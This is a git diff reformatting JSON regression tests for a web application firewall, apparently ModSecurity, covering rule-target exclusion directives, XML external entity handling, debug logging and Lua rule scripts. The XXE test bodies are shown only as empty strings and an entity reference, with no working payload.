1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude from ARGS_NAMES using regex (match)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?xxxyyy=value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?xxxyyy=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 \"!ARGS:/xxx/\"", "SecRule ARGS_NAMES \"@contains yyy\" \"id:1,phase:2,deny,status:403\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude from ARGS_NAMES using regex (no match)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude from ARGS_NAMES using regex (no match)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?xxyyy=value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?xxyyy=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 \"!ARGS:/xxx/\"", "SecRule ARGS_NAMES \"@contains yyy\" \"id:1,phase:2,deny,status:403\"" diff --git a/test/test-cases/regression/config-update-target-by-msg.json b/test/test-cases/regression/config-update-target-by-msg.json index 24fe343cd0..2c33890fa6 100644 --- a/test/test-cases/regression/config-update-target-by-msg.json +++ b/test/test-cases/regression/config-update-target-by-msg.json @@ -1,39 +1,44 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetByMsg test !ARGS", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,msg:'test',deny\"" diff --git a/test/test-cases/regression/config-update-target-by-tag.json b/test/test-cases/regression/config-update-target-by-tag.json index 10d4c1b487..32167c08fe 100644 --- a/test/test-cases/regression/config-update-target-by-tag.json +++ b/test/test-cases/regression/config-update-target-by-tag.json @@ -1,282 +1,317 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag (1/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag (1/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetByTag test !ARGS", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag (2/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag (2/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetByTag test !ARGS:'/.*y$/'", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag (3/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag (3/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetByTag test !ARGS:'/k.*/'", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag (4/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag (4/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetByTag test !ARGS:/ke/", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag Test (5/6) Regex with match anchored at beginning of Subject", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&ref=something", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 200 - }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateTargetByTag test !ARGS:'/(?!ref)/'", - "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" - ] + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag Test (5/6) Regex with match anchored at beginning of Subject", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/?key=value&ref=something", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" + }, + "body": [ + "no need." + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateTargetByTag test !ARGS:'/(?!ref)/'", + "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" + ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag Test (6/6) Regex with match anchored at beginning of Subject", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&ref=something", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 200 - }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateTargetByTag test !ARGS:'/^ref/'", - "SecRule ARGS \"@contains something\" \"id:1,pass,t:trim,tag:'test',deny\"" - ] + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag Test (6/6) Regex with match anchored at beginning of Subject", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/?key=value&ref=something", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" + }, + "body": [ + "no need." + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateTargetByTag test !ARGS:'/^ref/'", + "SecRule ARGS \"@contains something\" \"id:1,pass,t:trim,tag:'test',deny\"" + ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag Test (7/6) Exclusion by full name", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&ref=something", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 200 - }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateTargetByTag test !ARGS:ref", - "SecRule ARGS \"@contains something\" \"id:1,pass,t:trim,tag:'test',deny\"" - ] + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag Test (7/6) Exclusion by full name", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/?key=value&ref=something", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" + }, + "body": [ + "no need." + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateTargetByTag test !ARGS:ref", + "SecRule ARGS \"@contains something\" \"id:1,pass,t:trim,tag:'test',deny\"" + ] } ] diff --git a/test/test-cases/regression/config-xml_external_entity.json b/test/test-cases/regression/config-xml_external_entity.json index 1f5cf098dc..45031fe3a9 100644 --- a/test/test-cases/regression/config-xml_external_entity.json +++ b/test/test-cases/regression/config-xml_external_entity.json @@ -1,26 +1,28 @@ [ { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing SecXMLExternalEntity/XXE 1", - "expected":{ - "debug_log": "Target value: \" jo smith\"" + "enabled": 1, + "version_min": 300000, + "title": "Testing SecXMLExternalEntity/XXE 1", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "162" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", " &js;", "" ] - }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecXMLExternalEntity Off", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book[text()] \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass\"" + "expected": { + "debug_log": "Target value: \" jo smith\"", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecXMLExternalEntity Off", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book[text()] \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass\"" ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing SecXMLExternalEntity/XXE 2", - "expected":{ - "debug_log": "XML: Failed to load DTD: test-cases/data/SoapEnvelope.dtd", - "http_code": 403 + "enabled": 1, + "version_min": 300000, + "title": "Testing SecXMLExternalEntity/XXE 2", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "166" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", " &js;", "" ] - }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "XML: Failed to load DTD: test-cases/data/SoapEnvelope.dtd", + "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecXMLExternalEntity Off", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"", - "SecRule XML \"@validateDTD test-cases/data/SoapEnvelope.dtd\" \"id:500007,phase:3,deny\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecXMLExternalEntity Off", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"", + "SecRule XML \"@validateDTD test-cases/data/SoapEnvelope.dtd\" \"id:500007,phase:3,deny\"" ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing SecXMLExternalEntity/XXE 3", - "expected":{ - "debug_log": "XML Error: No declaration for element bookstore", - "http_code": 403 + "enabled": 1, + "version_min": 300000, + "title": "Testing SecXMLExternalEntity/XXE 3", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "166" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", " &js;", "" ] - }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "XML Error: No declaration for element bookstore", + "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecXMLExternalEntity On", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"", - "SecRule XML \"@validateDTD test-cases/data/SoapEnvelope.dtd\" \"id:500007,phase:3,deny\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecXMLExternalEntity On", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"", + "SecRule XML \"@validateDTD test-cases/data/SoapEnvelope.dtd\" \"id:500007,phase:3,deny\"" ] } ] - diff --git a/test/test-cases/regression/debug_log.json b/test/test-cases/regression/debug_log.json index 9e17fac69e..cda25c7d3e 100644 --- a/test/test-cases/regression/debug_log.json +++ b/test/test-cases/regression/debug_log.json @@ -15,8 +15,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -24,33 +24,35 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1=test¶2=test2", + "uri": "/test.pl?param1=test¶2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": ".*", - "error_log": "" + "http_code": 200 }, "rules": [ "SecRuleEngine On", @@ -58,7 +60,6 @@ "SecRule ARGS \"@contains /test.txt\" \"id:4,allow\"", "SecRule ARGS:teste \"@contains /test.txt\" \" id:1,allow,deny\"", "SecRule ARGS \"@contains /test.txt\" \"allow, allow,id:2,deny\"" - ] } ] diff --git a/test/test-cases/regression/directive-sec_rule_script.json b/test/test-cases/regression/directive-sec_rule_script.json index b8eb904759..846fe3d117 100644 --- a/test/test-cases/regression/directive-sec_rule_script.json +++ b/test/test-cases/regression/directive-sec_rule_script.json @@ -1,201 +1,214 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: SecRuleScript (1/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRuleScript (1/4)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } - }, - "expected":{ - "audit_log":"", - "debug_log":"", - "error_log":"", - "parser_error":"Failed to load script: Failed to compile script 'test-cases/data/match" - }, - "rules":[ + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "Failed to load script: Failed to compile script 'test-cases/data/match" + }, + "rules": [ "SecRuleEngine On", "SecRuleScript test-cases/data/match-ops.lua \"id:1,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: SecRuleScript (2/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRuleScript (2/4)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } - }, - "expected":{ - "audit_log":"", - "debug_log":"", - "error_log":"", - "parser_error":"Failed to load script: Failed to compile script " - }, - "rules":[ + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 